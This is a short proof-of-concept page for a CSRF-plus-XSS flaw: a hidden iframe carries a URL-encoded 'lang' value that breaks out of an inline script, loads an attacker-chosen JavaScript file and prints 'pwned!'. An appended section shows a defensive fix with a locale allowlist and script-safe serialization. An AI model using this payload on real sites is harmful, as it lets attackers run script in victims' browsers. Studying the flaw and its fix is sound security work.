CSRF+XSS / proof of concept
<title> PoC</title>
Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run.
To test it out, replace "[jsfile]" with "".
<iframe src=";svr=303&amp;lang=en_us%22%7D%0Aalert(1)%7D%20%7Bvar jsElm = document.createElement(&quot;script&quot;)%7D{jsElm.type = &quot;application/javascript&quot;}{jsElm.src = &quot;[jsfile]&quot;}{document.body.appendChild(jsElm)}%20function%20meow()%20%7Bif(true)%7B%7D%7D//%3C/script%3E%3Ccenter%3E%3Ch1%3Epwned!%3C/h1%3E%3C/center%3E%0A//&amp;aid=38787&amp;cid=14921140" style="display:none"></iframe>
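The fix on the receiving side, as an added example that is not part of the original gist or of the affected application: the `lang` value is checked against an allowlist and, when written into an inline script, serialized so it cannot close the string literal or the `<script>` element. That the vulnerable page wrote `lang` unescaped into a string inside an inline script is an assumption inferred from the payload's `"}` and `</script>` sequences; the function names, the allowlist and the `cfg` variable are hypothetical.

```javascript
// Added example. Assumption: the page reflected the raw "lang" query value
// into a string literal inside an inline <script> block.

// Hypothetical allowlist of locales the application supports.
const ALLOWED_LANGS = new Set(["en_us", "en_gb", "de_de", "fr_fr"]);

// Accept only known locales; anything else falls back to the default.
function validateLang(value) {
  return ALLOWED_LANGS.has(value) ? value : "en_us";
}

// Serialize a value for embedding inside an inline <script> block.
// JSON.stringify escapes quotes, backslashes and control characters, so the
// string literal cannot be closed. The replacements keep the HTML parser from
// ever seeing "</script>" or "<!--", and cover U+2028/U+2029, which
// JSON.stringify leaves raw.
function toInlineScriptLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Render the inline configuration block. validate=false exists only to show
// that the encoder holds on its own; production code keeps both layers.
function renderConfigScript(rawLang, { validate = true } = {}) {
  const lang = validate ? validateLang(rawLang) : rawLang;
  return `<script>var cfg = {lang: ${toInlineScriptLiteral(lang)}};</script>`;
}

// Constructed sample: a shortened, URL-decoded form of the lang value in the
// iframe above (string break-out, newline, script-close, injected markup).
const SAMPLE =
  'en_us"}\nalert(1)} //</script><center><h1>pwned!</h1></center>\n//';

console.log(renderConfigScript(SAMPLE));                      // allowlist applied
console.log(renderConfigScript(SAMPLE, { validate: false })); // encoder only
```
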